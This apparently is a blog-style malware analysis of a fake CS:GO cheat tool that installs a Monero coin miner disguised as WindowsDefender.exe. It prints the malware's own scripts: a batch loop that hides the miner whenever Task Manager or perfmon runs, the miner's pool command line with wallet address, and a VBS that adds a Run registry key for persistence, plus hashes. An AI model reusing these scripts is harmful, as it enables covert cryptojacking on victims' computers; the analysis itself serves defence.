Fake CS:GO Cheat Tool

As all we know, CS:GO is a famous online game, and lots of cheat tools for CS:GO are also available online, some of them is true(you’ ll get VAC ban soon~), but some of them are malwares.

Here is a sample.


After loaded into Exeinfo PE, we can find that the file is a Rar Sfx Archive, so just using WinRAR to extract it, and we will got a file named “file.exe”. From its icon, we can guess that the file is still a Rar Sfx Archive, but when we extract it, we are asked to give a password.

The former file is a Rar Sfx Archive, it may contain self-extract script, so let’s load the former file into WinRAR to find if any script contained.

Here is the script:

Setup=file.exe -pB7%s?LNmnAndbRN{
TempMode
Silent=1
Overwrite=1
Update=U

From this script, it’s clear that the password is “7%s?LNmnAndbRN{“, now we can extract the password-protected archive.

After extracted, we found the files inside are hidden, we have to remove their hidden attributes.

After removed hidden attributes, we can find lots of scripts & executable files. So, which one should we analyze first? Well, it’s better to see the self-extract script of “file.exe”. Here is its script:

Path=C:\Windows\Temp\Windows
Setup=sec.vbs
Setup=procces.vbs
Setup=autorun.vbs
Silent=1
Overwrite=1
Update=U

The script will let files extract to folder inside Windows directory, and run three vbs scripts. So, analyze the three scripts first is a better idea.

  • sec.vbs

“Defender.exe” will also extract this script, the script just want to limit the instance count of “WindowsDefender.exe” by registing register ExecNotificationQuery of WMIC.

  • procces.vbs

It just run “procces.bat”

  • procces.bat

@echo off
:begin
(tasklist |>nul Find /i “Taskmgr.exe” || tasklist |>nul Find /i “perfmon.exe”) || (goto Else)
:THEN
TASKKILL /IM “WindowsDefender.exe” /F
Goto end
:ELSE
tasklist |>nul findstr /b /l /i /c:WindowsDefender.exe || start run.vbs
timeout /t 2 /nobreak >nul
:END
goto:begin

From the script, we can find that the malware will be closed when it found “taskmgr.exe” or “perfmon.exe” in process list. If it found nothing, it will start run.vbs if not exist “WindowsDefender.exe”

  • run.vbs

It will query the IP address of current computer then add it as a parameter and run “run.bat”

  • run.bat

WindowsDefender.exe -o pool.minemonero.pro:5555 -u 4BJkthMnz2dXf4kohVYgf2W8SV1UL9J7Xbemj5w13hVecHi4cfXJvD9EEvWHWUtAJYWAmXbG3GkyVbrN8gfrQiBY3jbtC4r -p %1:nyhsjaqm@yomail.info -k –max-cpu-usage=50

Oh… The malware is a CoinMiner!

  • autorun.vbs

Dim vOrg, objArgs, root, key, WshShell
root = “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\”
KeyHP = “WindowsDefender”
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.RegWrite root+keyHP,”C:\Windows\Temp\Windows\Defender.exe”

Just let the malware can run when Windows starts.

 

Related MD5:

42C22D383A9D2CE5EA186B2A2FF846E6

5F70F5711803188AE9E4401C7E2142F5

 

X-Sec Antivirus Detection:

Cloud Engine: Cloud:Trojan.Win32.CoinMiner